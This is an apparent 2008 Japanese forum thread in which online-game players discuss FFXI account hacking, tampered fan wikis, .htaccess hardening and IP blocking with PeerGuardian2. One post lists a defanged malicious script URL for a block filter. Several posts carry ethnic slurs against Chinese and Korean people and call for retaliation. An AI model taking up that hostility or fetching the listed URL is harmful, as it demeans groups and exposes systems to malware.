.htaccessで Local Valueはoffに設定可能なことを確認済み。

330 名前:既にその名前は使われています:2008/08/22(金) 16:54:09 ID:Ut7swbxN
昨日W32.Gammima.AGを見つけて駆除したのですが
その後、ノートン、カスペル、スパイポッドで完全スキャンしても
何も出なかったので大丈夫と見てよろしいですか?
何か他にチェックすることありましたら教えてほしいです。


331 名前:既にその名前は使われています:2008/08/22(金) 17:05:45 ID:nFB2mark
Q 駆除したので大丈夫でしょうか?
A クリーンインストール

332 名前:既にその名前は使われています:2008/08/22(金) 17:11:00 ID:diH02zn5
シスコのルーターでバージョン情報特定されて、
バグを突かれる問題が昔あったが・・・
いまだにその辺の認識が甘いのか。

333 名前:既にその名前は使われています:2008/08/22(金) 17:13:54 ID:7r1LVkFp
「ftpサーバ公開する時は必ずバナーを書き換えろ」
そんな話を耳にする機会も減ったな


334 名前:既にその名前は使われています:2008/08/22(金) 17:51:56 ID:19rye8Ty
あげ

335 名前:既にその名前は使われています:2008/08/22(金) 17:52:17 ID:de7LP9Vk
tp://1039045744:88/jp.js
をルータのURLフィルタに突っ込んでみた。

なぜかFFが2回ほど回線切断(´;ω;`)

336 名前:既にその名前は使われています:2008/08/22(金) 17:52:52 ID:5hcJSntH
>6
でPG2がダウンロードできないんですが何がいけないんでしょう?
ブラウザはIE、狐で試しましたが真っ白に表示されてしまいます

337 名前:既にその名前は使われています:2008/08/22(金) 17:54:34 ID:bxZId0qP
>>308
また改竄されたわけだし、すくなくとも当面の対策として
別レン鯖への移転しかないよね。
どこが安全かはわからないけど。

338 名前:既にその名前は使われています:2008/08/22(金) 17:55:44 ID:gD0a6U44
>>321
FC2ブログの例はどう?269gも結局何もアナウンス無かったっけ。

有料ならまだしも、無料だとなるとその管理レベルはスキルのない自前設置CMS運営と
さして変わらんと思う。安全かそうでないかって問題だから、どっちがマシって言われても微妙だね。

339 名前:既にその名前は使われています:2008/08/22(金) 18:03:56 ID:rE0/E4WD
>>338
ttp://blog.blog2.fc2.com/blog-entry-75.html
ユーザが個別にバラバラのバージョンのアプリを自力で設置して
メンテもされない有象無象よりはマシだと思うがね。

340 名前:既にその名前は使われています:2008/08/22(金) 18:07:10 ID:anivsh2s
>>336
落とせますよ、かなり接続先が重いですけど
(●の部分2ヶ所をhに変えられてますよね?)

341 名前:既にその名前は使われています:2008/08/22(金) 18:17:00 ID:nLeEXbFS
>>308
>今回も改ざんは.cssの模様。
.cssいじられてスクリプト埋め込まれたってこと?意味不明なんだが。

>もう少し具体的にアクセスログとか情報出してくれるといんだけど
アクセスログが出てくると何が分かるんだ?kwsk


黒魔WikiはPHP関係の対策したけど再ハックされてるみたいだし、
前回のスクリプト経由とかいうXREAの発表は間違いでは?
んで、吟テンプレだけ再ハックされてないけど、FTPパスワード変えたと発表してるのがここだけ。
やっぱXREAのFTPパスワードが大々的に漏れてんじゃないの?

342 名前:既にその名前は使われています:2008/08/22(金) 18:23:36 ID:iB6Vin1V
>>332
シスコのルーターって言うと中華のコピー品が出回ったと事があったね。
アメリカ国防省あたりが入れてくれる事を願ってバックドア付きの奴をw

343 名前:既にその名前は使われています:2008/08/22(金) 18:27:27 ID:EewF4yy2
>>342
そんでハードウェアの作りが悪かった所為でリアル発火してバレちゃったやつなw


344 名前:既にその名前は使われています:2008/08/22(金) 18:32:17 ID:T18rGyS9
またやられたのか。もう自衛以外どうしようもなくなってきたな。

■eの対応も良いとは思えないけどね。

345 名前:既にその名前は使われています:2008/08/22(金) 18:32:32 ID:diH02zn5
ネットでもリアルでも特亜だけはないは・・・
ネットともなると避けようがないレベルで無差別にやらかしてくれるし

346 名前:既にその名前は使われています:2008/08/22(金) 18:43:20 ID:7r1LVkFp
>338
無料でも企業がサービスとして提供している時点で個人が趣味レベルで自前設置しているよりはマシだと思う。
作成されたシステムの出来不出来は別だが(FC2の時みたいな)環境に関しては1本化してメンテされてる。

契約したサーバの環境、自分で設置したスクリプト
この2つに発生した脆弱性を正しく把握して更新している奴がいったいどれだけ居るかな?。

347 名前:既にその名前は使われています:2008/08/22(金) 18:43:23 ID:7wm8h2pd
もう、ISPレベルで特亜のIP denyサービスが欲しいな。

348 名前:既にその名前は使われています:2008/08/22(金) 19:32:40 ID:bFFb+UpR
209 ホシュ

349 名前:既にその名前は使われています:2008/08/22(金) 19:38:39 ID:gYw/jHGU
業者のやろうがsageてるなage

350 名前:既にその名前は使われています:2008/08/22(金) 19:40:34 ID:XoE0o6Ci
2chびゅあーはデフォルトでsageになるんだから忘れてもしょうがあるまいw

351 名前:既にその名前は使われています:2008/08/22(金) 19:42:05 ID:C/2shkaA
別に下がるってわけじゃないしなw


352 名前:既にその名前は使われています:2008/08/22(金) 19:48:45 ID:gYw/jHGU
実況板で何をいってんだね

353 名前:黒魔メモの人:2008/08/22(金) 20:07:36 ID:1dgPtflc
スクリプトが仕込まれていたので修正しました。
報告してくれた方ありがとうございました。

今回仕込まれたのはindex.phpで、
pukiwiki.phpは触られた形跡がありますが
怪しい点はありませんでした。

・前回からの変更点
FTPパスは変更済み
.htaccessで以下のflag?をoff、いくつかのIPをdenyで制限
php_flag allow_url_fopen off
php_flag allow_url_include off
php_flag register_globals off

他に対策をご存じの方居ましたら教えて頂けると有り難いです…orz

354 名前:既にその名前は使われています:2008/08/22(金) 20:08:36 ID:vQFS+MH6
>>349
普段は隔離スレでageちゃいけないから癖でsageちゃうんだよ!

355 名前:既にその名前は使われています:2008/08/22(金) 20:31:26 ID:bxZId0qP
>>341
>>353
鯖のコンパネにはっきりとFTPパスやらその他設定が見えちゃう仕様なので
次は、ひょっとするとひょっとするかもしれないので、
移転が得策かもしれないです。


356 名前:既にその名前は使われています:2008/08/22(金) 20:35:44 ID:sKju6Hm3
>>353
PukiWiki 1.4.7利用でしたらpukiwiki.phpを削除しちゃってもいいかもです。
その代わり.htaccessでpukiwiki.phpにアクセスしてきた人用にリダイレクトかましておくとか

357 名前:既にその名前は使われています:2008/08/22(金) 20:36:03 ID:vQFS+MH6
>>353
deny制限は一時凌ぎな予感
register_globals off とかもうやっているだろうし
php自体に不備があるのとサーバーに不備があるのと両方だろうと思っている
移転は効果があるかもしれないけど、タゲにされている状態だからブラウザでいえばIEと同じかも

358 名前:既にその名前は使われています:2008/08/22(金) 20:37:04 ID:vQFS+MH6
sageチェック外れてなかった

359 名前:既にその名前は使われています:2008/08/22(金) 21:32:34 ID:F5avExP8
糞スレ乱立しているようなのでage

360 名前:既にその名前は使われています:2008/08/22(金) 22:13:58 ID:OFJe50GY
ネットの世界だけでも、特亜と断交して欲しい。
マジで被害減るから。

361 名前:既にその名前は使われています:2008/08/22(金) 22:36:25 ID:j/xhronm
あげますよ

362 名前:既にその名前は使われています:2008/08/22(金) 23:29:07 ID:sKju6Hm3
ho

363 名前:既にその名前は使われています:2008/08/22(金) 23:39:23 ID:Hp+G+OsS
保守

364 名前:既にその名前は使われています:2008/08/23(土) 00:11:43 ID:6Ele3o5f
スクエニは抜本的なアカハック対策はしないのかね?
FF11の3大攻略サイトが改竄でもされたらどうすべ。

365 名前:既にその名前は使われています:2008/08/23(土) 00:21:21 ID:7pegfwfX
公式を改竄されて抜本的な垢ハックってのはどうよ?

366 名前:既にその名前は使われています:2008/08/23(土) 01:01:18 ID:CF5dDZsZ


367 名前:既にその名前は使われています:2008/08/23(土) 01:01:38 ID:OeoyVPvT
>>365
是非シナにはそれをやってほしいが、そこまでやるとさすがの■eもシナ対策をはじめてしまう。
シナもそこまでバカじゃないので■e公式改竄だけは着手しないんじゃね

368 名前:既にその名前は使われています:2008/08/23(土) 01:41:15 ID:HU6ypco6
保守

369 名前:既にその名前は使われています:2008/08/23(土) 01:52:41 ID:u56GRaZE
>>245
スレタイ長すぎw

370 名前:既にその名前は使われています:2008/08/23(土) 02:32:54 ID:9ss/yRE3
当方PG2で香港台湾中国韓国リネMMOToroyanブロック(一応火狐NOScriptも)

この環境で、引越し前のWikipediaとかは普通にはじいてたのに
今日韓国の動画サイトから普通にDLできちゃったんだが・・・
ちなみにサイトはhttpころん//tvpot.daum.net/

当方絵描きでPC使ってる程度なのでweb知識はいまひとつ自信がありません。
なぜこのサイトを読みにいけたのか先達の方教授願えれば幸いです。

371 名前:既にその名前は使われています:2008/08/23(土) 02:33:50 ID:9ss/yRE3
追記ですがカスペオンラインスキャンでは白でした。

372 名前:既にその名前は使われています:2008/08/23(土) 02:45:48 ID:uHf3Mc9k
>>370
PG2でちゃんと弾くよー。

373 名前:既にその名前は使われています:2008/08/23(土) 02:46:24 ID:X0lEAj3z
>>370
普通に弾きます<httpころん//tvpot.daum.net/
IP調べても韓国IPしか出てこないな・・・
弾かないのは、許可しちゃったか、お手元のブロックIPが飛んでるか
くらいしか思い浮かばないので、ブロックIPを調べてみてください
たまにリストが消えてることがあります
ちなみにWikipediaはUSにサーバが変わったらしいので弾かなくなりました

374 名前:373:2008/08/23(土) 02:51:38 ID:X0lEAj3z
いまDLできるリストには異変はないように思います

375 名前:既にその名前は使われています:2008/08/23(土) 02:56:24 ID:uHf3Mc9k
もしかして、HTTPを許可とかしてない?w

376 名前:既にその名前は使われています:2008/08/23(土) 03:01:47 ID:X0lEAj3z
あ、それですね
HTTP許可になってると接続される
HTTP許可の可能性が高いですね

377 名前:既にその名前は使われています:2008/08/23(土) 03:30:47 ID:Njugq31F
VU大好き
脆弱性の修正とか関係なしに
Windows、Flash Player、Opera等、セキュリティ上重要なものをはじめ
Winampやゲームのパッチまで、とにかくアップデートが好き
特に自動アップデート時のバーが進行する様子を眺めてるのがいい

そんな関係のない話をしつつほしゅ

378 名前:既にその名前は使われています:2008/08/23(土) 04:57:08 ID:Njugq31F
でもβ版は怖くて手が出せない
再びほしゅ

379 名前:既にその名前は使われています:2008/08/23(土) 08:10:06 ID:hGY6bHix
気持ちは分かるw

380 名前:既にその名前は使われています:2008/08/23(土) 08:49:48 ID:0eh0K2If
巻き戻しスレが止まっているのは業者に情報を与えないためですかね?


381 名前:既にその名前は使われています:2008/08/23(土) 10:00:26 ID:d4x1tc/W
更に保守

382 名前:既にその名前は使われています:2008/08/23(土) 10:04:59 ID:Njugq31F
アンチウイルスソフトも更新するの好きなんだけど、
PeerGuardian2を頻繁に更新してると、
1日1回の定期更新とかぶったときに(?)エラーはくから困る
ほしゅ

383 名前:既にその名前は使われています:2008/08/23(土) 10:16:02 ID:EKu+3P8v
マジレスすると
自称セキュリティ中級〜上級者が自己満足してる時点でこのスレは業者には有益でも利用者には無益だな
テンプレ以外wwww

384 名前:既にその名前は使われています:2008/08/23(土) 10:23:00 ID:eVzNtaYc
馬鹿の例
・アンチウイルス入れたのに常駐監視無効
・ファイアウォール入れたのに全接続許可
・PG2入れたのにHTTP許可
・NoScript入れたのにすべてのサイトのJavaScriptを許可

>>383
このスレに書いてある内容なんざ、業者にとっちゃ常識以前の「子供の躾」レベルだぞ
ママにおしめ替えてもらってる赤ん坊がネトゲユーザーには多すぎるってことだ

385 名前:370:2008/08/23(土) 11:39:30 ID:9ss/yRE3
HTTP許可になってました・・・_| ̄|○ il||li
直してきます。

386 名前:既にその名前は使われています:2008/08/23(土) 11:42:05 ID:OSqivet7
セキュニアPSIお勧め

387 名前:370:2008/08/23(土) 11:52:30 ID:9ss/yRE3
もう一度導入説明読み直してきたんですが、
デフォルトでHTTP許可になっていて、ブロックボタン押せって書かったので
余計なとこいじらないほうがいいのかと思ってたのと、
Wikipediaが引越しする前はkrはじけてたので安心してたorz

素人なんで危ない危ない、早めに気づけてよかった・・・みなさんありがとう

388 名前:既にその名前は使われています:2008/08/23(土) 11:56:46 ID:AeknuHX8
age

389 名前:既にその名前は使われています:2008/08/23(土) 12:01:02 ID:ZlAN1YH3
>>384
そこに挙げられている事項に対してどうするかが重要であって
自分自身もさほどの知識も知恵もないに関わらず
低い鼻を高く持ち上げて他人を嘲笑する馬鹿ほど哀れなものはない。

何を言いたいかというと、リアル子供の躾も受けていない在日はだまってろ。

390 名前:既にその名前は使われています:2008/08/23(土) 12:20:25 ID:QHkyz3n4
>>384
意味がわからないので教えてください
>・PG2入れたのにHTTP許可

これしてもWEBみれますか

391 名前:既にその名前は使われています:2008/08/23(土) 12:42:08 ID:yfMTvo34
>>390
お前の質問の方が意味がわからない

392 名前:既にその名前は使われています:2008/08/23(土) 12:49:07 ID:wlYOfcii
>>390
そもそも、何のためにPG2入れるか分かってる?

393 名前:既にその名前は使われています:2008/08/23(土) 12:51:21 ID:hBpLwzWz
>>390
君の質問は「HTTP許可してもWEB見れますか」なのか
「HTTP許可はバカって言われてるけどじゃあHTTPブロックしてもWEB見れますか」なのか
どっちなんだい

394 名前:既にその名前は使われています:2008/08/23(土) 12:54:05 ID:MnWpYQm2
セキュリティーの話としては何言ってるの?って感じ
ソフトの使い方の話なら、試してみれば?ってとこ


395 名前:既にその名前は使われています:2008/08/23(土) 12:59:37 ID:MAXpLaBd
ウェブがhttp://で始まるからHTTP許可しなくても見れるのか?って言いたいんだろ

396 名前:既にその名前は使われています:2008/08/23(土) 13:02:15 ID:QHkyz3n4
はい、それで導入したものか
ためらい中

397 名前:既にその名前は使われています:2008/08/23(土) 13:04:46 ID:wlYOfcii
そういう意味なら見れる。が当然ブッロクしてるIPのサイトは見れんぞ。

398 名前:既にその名前は使われています:2008/08/23(土) 13:07:08 ID:QHkyz3n4
>>397
即答ありがとうございます
FFやってないのでいれてませんでしたが、設定してみようと思います
今やってるのは
ネ実民で大航海2
http://changi.2ch.net/test/read.cgi/ogame/1219430180/
です

399 名前:既にその名前は使われています:2008/08/23(土) 13:15:05 ID:hBpLwzWz
>>398
とりあえずコーエーのネトゲは市民IDで信も大航海も一元管理だから
始める前にPCに変なの飼ってないかチェックしときなよ
ここ最近話題に上がるKernaeghDrv.dllは信で猛威を振るってたしね
泥棒に侵入された後にカギかけたって意味ないからねー


400 名前:既にその名前は使われています:2008/08/23(土) 13:20:31 ID:QHkyz3n4
>>399
こちらのスレはFC2の4月ぐらいの騒動から勉強させていただいています。
PG2以外はこちらの通りに対策しています

401 名前:既にその名前は使われています:2008/08/23(土) 13:56:27 ID:eVzNtaYc
PG2(PeerGuardian 2)は元々、その名の通りP2P(Peer to Peer)ソフトがターゲットで、
P2Pネットワークを監視している団体などを遮断する目的で作られたが、
P2Pネットワークのパフォーマンス等に悪影響を及ぼす特定地域を弾くためにも使われている

そのため、P2Pソフトでは特定地域を弾きたいが、ブラウザでは特定地域のサイトも閲覧したい、
といった需要を考えて「HTTP許可」の機能が用意されている
「HTTP許可」の状態では、特定地域との通信でもHTTPであれば許可されブラウザ等で表示できる

しかし、我々はむしろ特定地域のサイト閲覧を阻止するためにPG2を導入するのであり、
「HTTP許可」の状態では、導入する意味が全くと言っていいほど無くなってしまう

402 名前:既にその名前は使われています:2008/08/23(土) 14:28:04 ID:kaE4Je2s
セキュリティもユーザー任せねえ

403 名前:既にその名前は使われています:2008/08/23(土) 15:00:57 ID:wxjm/jZp
当たり前だろ?

404 名前:既にその名前は使われています:2008/08/23(土) 15:49:08 ID:hGY6bHix
もはやネトゲだけの問題じゃないからな。


405 名前:既にその名前は使われています:2008/08/23(土) 15:51:50 ID:49nGoowO
自分の身は自分で守る、これ基本
そもそも日本人って危機意識薄いから問題

406 名前:既にその名前は使われています:2008/08/23(土) 16:21:13 ID:kmnrHFXe
■復帰報告
 7/13〜7/15 アカハック
 7/16 他の垢からGMコール、垢ロック
 7/18 やっとサポセンに電話つながり、パス再発行
 7/19 データ復旧依頼書投函
 7/22 サポセン着(配達記録)
 8/22 一ヶ月たっても連絡ないので、GMコールでクレーム
 8/23 12:10 復旧完了のメールが届く;;
■復元内容
 ・キャラ、ギル、アイテム:ハックされた1〜2日前の状態。
  ギル約1億8千万、クラクラ、ノービオ耳、スピベル等の高額アイテムも無事復旧。
 ・競売出品:全て消去。
 ・宅配:モグハのポスト(受け取っていたもの)は大丈夫。送っていた側は全て消去。
■費用(直接かかった)
 サポセンへの電話代、約6000円(待機させられたのがほとんど)データ復旧依頼書の郵便代、約400円
■スクエアへ
 復元してくれてありがとう。だが、サポセンのサービスレベル(受付時間、窓口数)は最低だ。改善願いたい。
■最後に
FLPayerからのウィルス感染でした。俺カスすぎる;;
長々報告したが、いろいろアドバイスくれたお前らにありがとう。そして、率先して垢復旧の手伝いをしてくれた嫁に大感謝。

407 名前:既にその名前は使われています:2008/08/23(土) 16:28:27 ID:KfknIyQj
どうせサポセンは外部委託だし、派遣の電話受付だろ
サービスレベル上げる、窓口増やす=金がかかるわけで、ハックされなきゃ要らない人件費なわけだ

月額上げれば改善出来るかもしれないが、垢ハックしてない人まで金払うのは無理だな

408 名前:既にその名前は使われています:2008/08/23(土) 16:29:26 ID:HtfZv463
ぼすちきん乙

409 名前:既にその名前は使われています:2008/08/23(土) 17:28:32 ID:7tGXXB9N
電話代6千円って、何十時間待たされたんだよw

410 名前:既にその名前は使われています:2008/08/23(土) 17:37:02 ID:mc17zfI7
俺は3日かけ続けて電話代15000円くらい取られたぞ

411 名前:既にその名前は使われています:2008/08/23(土) 17:59:13 ID:uDB04c6a
■<デフレ防止になってうれしい

412 名前:既にその名前は使われています:2008/08/23(土) 18:05:49 ID:F1nQFhlA
電話代6000円とか15000円とかw
NAだったら余裕で訴訟レベルだな

413 名前:既にその名前は使われています:2008/08/23(土) 18:22:13 ID:dAGM/54+
■eはFF11でかなり儲けてるが、その儲けがFF11にはほとんど使われず、
他クソゲームに使われてしまう腹立たしさよ・・・。

414 名前:既にその名前は使われています:2008/08/23(土) 18:23:44 ID:kaE4Je2s
>>405
そだねー
なら警察も自衛隊も解体だ
>>410
3回くらいのかけなおしで繋がった俺はラッキーか

415 名前:既にその名前は使われています:2008/08/23(土) 18:56:38 ID:nYIt2rZI
>>406
おめー ついでにage

416 名前:既にその名前は使われています:2008/08/23(土) 19:57:50 ID:49nGoowO
200からあげ

417 名前:既にその名前は使われています:2008/08/23(土) 20:12:45 ID:6Ele3o5f
>>413
FF13商法にはワロタなw

418 名前:既にその名前は使われています:2008/08/23(土) 20:17:52 ID:EKu+3P8v
>>406
自分が悪かったって理解してるようだし次は気をつけてな
大概3ヶ月以内には同じ人間がハックされるそうだがw


419 名前:既にその名前は使われています:2008/08/23(土) 20:23:48 ID:kaE4Je2s
うちらも対抗して
中華サイトに罠貼り付けようぜ

420 名前:既にその名前は使われています:2008/08/23(土) 20:27:55 ID:KN8L78/6
>>419
残念取るものがないw

421 名前:既にその名前は使われています:2008/08/23(土) 20:28:35 ID:50P+GlXf
>>419
それより もう中国潰すか

422 名前:既にその名前は使われています:2008/08/23(土) 20:36:13 ID:qgH/Jg+2
こないだちょっと田代が貼られた時
スーパーハカーの人はDBに侵入出来ちゃったみたいだけど
不謹慎ながらもっとやれと言いたい

423 名前:既にその名前は使われています:2008/08/23(土) 21:49:00 ID:pJBAXqW9
にゃー

424 名前:既にその名前は使われています:2008/08/23(土) 21:53:54 ID:OOUxt0UM
>>423
可愛いにゃー

425 名前:既にその名前は使われています:2008/08/23(土) 22:39:31 ID:CF5dDZsZ
ho

426 名前:既にその名前は使われています:2008/08/23(土) 23:47:27 ID:52kKq9F1
あげ

427 名前:既にその名前は使われています:2008/08/24(日) 00:42:22 ID:ZyEvbIPo
7月14日確認書類投函なのに未だ巻き戻し終わってない
22日にサポセンに聞いたら、最終処理中との事
んで、今日も完了メール来ねーw

もうすぐ7週目に入るけど、こんなサービスでいいのかスクエニは

428 名前:既にその名前は使われています:2008/08/24(日) 00:45:12 ID:0+Tunwkt
おやすみ前の上げ

429 名前:既にその名前は使われています:2008/08/24(日) 01:52:19 ID:KKlQOuuP
7週目すげーな。今まで6週が最長かとおもってが・・・・・
一番なげーやつってどれくらいなんだろ8週とかかな。

ついでに200近くまでおちてるんであげ

430 名前:既にその名前は使われています:2008/08/24(日) 01:54:05 ID:SNshygVs
お世話になる人たち向けにage

431 名前:既にその名前は使われています:2008/08/24(日) 02:20:16 ID:HBzbfvTC
IANA-NETBLOCK-192
ってなんでしょうか;;

432 名前:既にその名前は使われています:2008/08/24(日) 02:21:41 ID:4wxkz8KE
"IANA-NETBLOCK-192 " の検索結果 約 87 件中 1 - 10 件目 (0.23 秒)

433 名前:既にその名前は使われています:2008/08/24(日) 02:27:14 ID:LU7rLWA1
「;;」「><」うぜえ。
被害者アッピルしたところで状況は何も好転しない。

434 名前:既にその名前は使われています:2008/08/24(日) 02:28:58 ID:SNshygVs
初心者なのでうんぬんもどうかと思うんだけどね。
最近この手のが多い。

435 名前:既にその名前は使われています:2008/08/24(日) 02:47:05 ID:ngQpkZ5I
昔からいただろ初心者と言う言葉を免罪符にするやつって

436 名前:既にその名前は使われています:2008/08/24(日) 02:58:42 ID:oEGCxOqS
「初心者」向けのPCにはgoogleとかYahooとかがついてないんだよ・・・
たぶん知らないけどきっとそう。

437 名前:既にその名前は使われています:2008/08/24(日) 03:02:49 ID:+jmTLxOl
「初心者お断り」ってテンプレに書きますか?

438 名前:既にその名前は使われています:2008/08/24(日) 03:03:02 ID:SNshygVs
超本格初心者仕様wwww
グーグルもヤフーも一から入れていけばステップアップで脱初心者!(笑)

439 名前:既にその名前は使われています:2008/08/24(日) 03:03:52 ID:SNshygVs
っとsageてもうた

440 名前:既にその名前は使われています:2008/08/24(日) 03:08:49 ID:+jmTLxOl
ちなみに、このスレのテンプレを作ってるのは初心者です

441 名前:既にその名前は使われています:2008/08/24(日) 03:10:20 ID:SNshygVs
別に初心者でもいい、実際ほとんど初心者だっただろうし。
でもテンプレ読めないのは初心者以前の問題かと。

442 名前:既にその名前は使われています:2008/08/24(日) 03:14:29 ID:+jmTLxOl
【テンプレ】RMT業者の垢ハックが多発している件37 【必読】

くらいにスレタイ変えてみるのも手だとは思います
ちょと長いですけどね

443 名前:既にその名前は使われています:2008/08/24(日) 03:18:43 ID:16+gbNbr
申請して3週間経つが完全に熱が冷めたな


444 名前:既にその名前は使われています:2008/08/24(日) 03:21:02 ID:SNshygVs
被害はないに越したことは無いしね。
FFの公式掲示板でも呼びかければいいと思うんだけどなぁ。
■がもう少し対応してくれればなぁ

445 名前:既にその名前は使われています:2008/08/24(日) 03:22:00 ID:SNshygVs
ま た か すまんage

446 名前:既にその名前は使われています:2008/08/24(日) 03:46:15 ID:mWVz3tj9
>FFの公式掲示板

むかーしむかし「開発情報」というディスカッションの場があってね
そこでは開発様の気にそぐわない発言をするとレス削除+アカ停しちゃうぞメールのこんb

おや、こんな時間に誰か来たようだ

447 名前:既にその名前は使われています:2008/08/24(日) 04:05:59 ID:SdIw8Lsz
なんか知らんけどPSOの公式BBSを思い出したわ

448 名前:既にその名前は使われています:2008/08/24(日) 04:11:19 ID:KKlQOuuP
RMT業者がハックされてるよーにぱっとみ見える

449 名前:既にその名前は使われています:2008/08/24(日) 04:12:03 ID:iJaCKO65
サポセンに8月いっぱい遊べねーから解約しとけって言われたけど、もう完了メール来た。
今復活させたら課金対象だよね?

450 名前:既にその名前は使われています:2008/08/24(日) 04:13:32 ID:KKlQOuuP
課金対象だな
そんな境遇になりたいと思う現在5週目の涙目の俺

451 名前:既にその名前は使われています:2008/08/24(日) 07:19:39 ID:7Cpba1m3


452 名前:既にその名前は使われています:2008/08/24(日) 07:59:13 ID:4GfEbdD4
>>442
スレタイ全角24文字まで

453 名前:既にその名前は使われています:2008/08/24(日) 09:58:03 ID:1OG3wq7I


454 名前:既にその名前は使われています:2008/08/24(日) 10:02:40 ID:XKxBaN6E


455 名前:既にその名前は使われています:2008/08/24(日) 10:08:11 ID:Eqn4rYBc


456 名前:既にその名前は使われています:2008/08/24(日) 10:08:51 ID:4wxkz8KE


457 名前:既にその名前は使われています:2008/08/24(日) 10:09:27 ID:1OG3wq7I


458 名前:既にその名前は使われています:2008/08/24(日) 10:38:04 ID:9Gt7XWp5


459 名前:既にその名前は使われています:2008/08/24(日) 10:40:20 ID:nQWMXtit


460 名前:既にその名前は使われています:2008/08/24(日) 10:52:26 ID:1085s1sY
ホモサピエンス完成おめでとう。

ハックされて別垢やりだしたらはまったw

461 名前:既にその名前は使われています:2008/08/24(日) 12:28:47 ID:7Cpba1m3


462 名前:既にその名前は使われています:2008/08/24(日) 12:47:29 ID:Gj2aIULV
も >>461

463 名前:既にその名前は使われています:2008/08/24(日) 13:15:00 ID:H6oi8HDV
http://www.playonany.co.jp/

464 名前:既にその名前は使われています:2008/08/24(日) 13:16:06 ID:gtFhdf6B
>>463
ウホッ いいURL

465 名前:既にその名前は使われています:2008/08/24(日) 13:40:50 ID:IkigusUy
ぷれいおなにーとか別のもの抜かれそうだなw

466 名前:既にその名前は使われています:2008/08/24(日) 13:51:35 ID:esvJ0Bcj
一応調べたけど存在しないURLだねw

467 名前:既にその名前は使われています:2008/08/24(日) 13:57:28 ID:BptWWA+2
play on any だろ・・・常識的に考えて・・・卑猥すぎます(><;)

468 名前:既にその名前は使われています:2008/08/24(日) 14:09:56 ID:+HhjpY7l
平和だな〜

469 名前:既にその名前は使われています:2008/08/24(日) 14:13:21 ID:zW0ruRU/
復旧後に少し不具合があってGMコールしたが、待ち時間もそんなになかったし多少は沈静化してきたのかね

470 名前:既にその名前は使われています:2008/08/24(日) 14:20:45 ID:FuMQeuWm
1回目を付けられたら、多少のことじゃ被害は減らないと思うんだが。
嵐の前の静けさじゃないか?

471 名前:既にその名前は使われています:2008/08/24(日) 14:38:34 ID:RrxXBoPo
7月14投函でいまだ復旧せずw
丸1ヶ月と1週間か・・・・
もっと長い人いる???


472 名前:既にその名前は使われています:2008/08/24(日) 14:40:05 ID:esvJ0Bcj
>>471
そこまで長引いてるなら一旦サポセンかGMチャットで問い合わせてみた方がよさそう

473 名前:既にその名前は使われています:2008/08/24(日) 14:41:10 ID:mWVz3tj9
新しい手口で大規模な被害が出る→対策が周知され被害が減る→また新しい手口g
のループだから、一時的な増減はあっても沈静化っつーのは難しいかもね。
アカハク被害が出始めた頃から今まで罠を仕込む手口やトロイの挙動は常に巧妙・悪質になってるし。

RMTに旨みが無くなるか、アカハク以上に旨みのある手段が見つかるか、FFが終わるか、
それくらいの状況の変化が無い限りアカハクは無くならないし手口はエスカレートしていくと思う。

474 名前:既にその名前は使われています:2008/08/24(日) 14:43:22 ID:RrxXBoPo
>>472
さっき、GMチャットでもう1週間は待たせないと思いますって言われました。
これでまた1週間、さらにまた1週間て引き伸ばされるのが一番怖いっすね。
鯖移動アリかナシ&キャラ数によるのかなあ(;´Д`)


475 名前:既にその名前は使われています:2008/08/24(日) 15:10:42 ID:zW0ruRU/
>>474
同じく7/14投函だが、8/17くらいに復旧完了のメールきてたわよ
復旧の申請したキャラ数は4体ね

476 名前:既にその名前は使われています:2008/08/24(日) 15:18:52 ID:RrxXBoPo
>>475
オレはキャラ6人で、鯖移動有りなんです
7月下旬に申請した人が先に復帰出来てるってのが
腑に落ちないなあ


477 名前:既にその名前は使われています:2008/08/24(日) 15:57:46 ID:H6oi8HDV
ケーサツ:何故被害に遭いましたか?
僕:プレイ○ナニー・・・


478 名前:既にその名前は使われています:2008/08/24(日) 16:27:05 ID:esvJ0Bcj
>>477
マジレスすると「公式サイトであるplayonlineとよく似た名前の偽URLをクリックしてしまいました」
でいいからなw

479 名前:既にその名前は使われています:2008/08/24(日) 17:17:27 ID:KKlQOuuP
7月14日ハック
7月16日速達記録で投函
8月24日復旧
キャラ数5

あげー

480 名前:既にその名前は使われています:2008/08/24(日) 17:40:46 ID:7Iv/+Ipd
もう秋やね…age

481 名前:既にその名前は使われています:2008/08/24(日) 17:45:20 ID:KKlQOuuP
秋が終わったら冬やね・・・age

482 名前:既にその名前は使われています:2008/08/24(日) 17:46:54 ID:SinEo2cK
秋なので夏がこない問題は解決した

483 名前:既にその名前は使われています:2008/08/24(日) 17:48:23 ID:zW0ruRU/
STTが解散しない限り夏は終わらない・・・

484 名前:既にその名前は使われています:2008/08/24(日) 17:55:06 ID:N4rjyQZE
■<平成2008年の夏までには、FF11から業者を一掃します。

485 名前:既にその名前は使われています:2008/08/24(日) 17:59:37 ID:KKlQOuuP
平成かよ!

486 名前:既にその名前は使われています:2008/08/24(日) 18:06:57 ID:1/+wN/mu
今のSTT解散でもっと権限の高い連中で新たな不正者対策チーム作ってくれ。

487 名前:既にその名前は使われています:2008/08/24(日) 18:32:57 ID:IkigusUy
120age

488 名前:既にその名前は使われています:2008/08/24(日) 19:27:33 ID:Wb1rvCJH
すみません。上記サイトを見てもわからなかったので、
Realplayerのアンインストールの方法を教えていただけないでしょうか。
お願いします。

489 名前:既にその名前は使われています:2008/08/24(日) 19:29:00 ID:SdIw8Lsz
>>488
さすがに板違い。
http://pc11.2ch.net/software/


490 名前:既にその名前は使われています:2008/08/24(日) 20:03:05 ID:1085s1sY
>>488
板違いだが、不要なセキュリティホールになりえるソフトを外すのは良い心掛けだな。


491 名前:既にその名前は使われています:2008/08/24(日) 20:08:42 ID:+HhjpY7l
>>488
RealPlayerのアンインストール

たぶんRealPlayer自身がUninstallerを持ってると思いますが、説明しても
わからないといけないので

「コントロールパネル」→「アプリケーションの追加と削除」でRealPlayerを選択
→「変更と削除」をクリック

こっちで消してください

インストールしたフォルダが残ると思いますので、最後にエクスプローラから
インストールしたフォルダーを手動で削除

で、終わりです

まぁ、これくらいのことは調べればすぐわかりますよ
「Realplayerのアンインストール」みたいなキーワードで検索すれば
YahooでもGoogleでもいっぱいヒットしてきます

492 名前:既にその名前は使われています:2008/08/24(日) 20:25:21 ID:O3Ck4t7F
「FC2のセキュリティが甘い」は不適切
「FC2は、カスタム性が強く知識が無い方がセキュリティの穴を作る」が適切

「公式テンプレート以外を利用しているサイト」でiframe タグを利用したファイル読み込ませ行為が発生した
WindowsUpdateを含めたセキュリティアップデートをしていないPCに影響が出る物だ

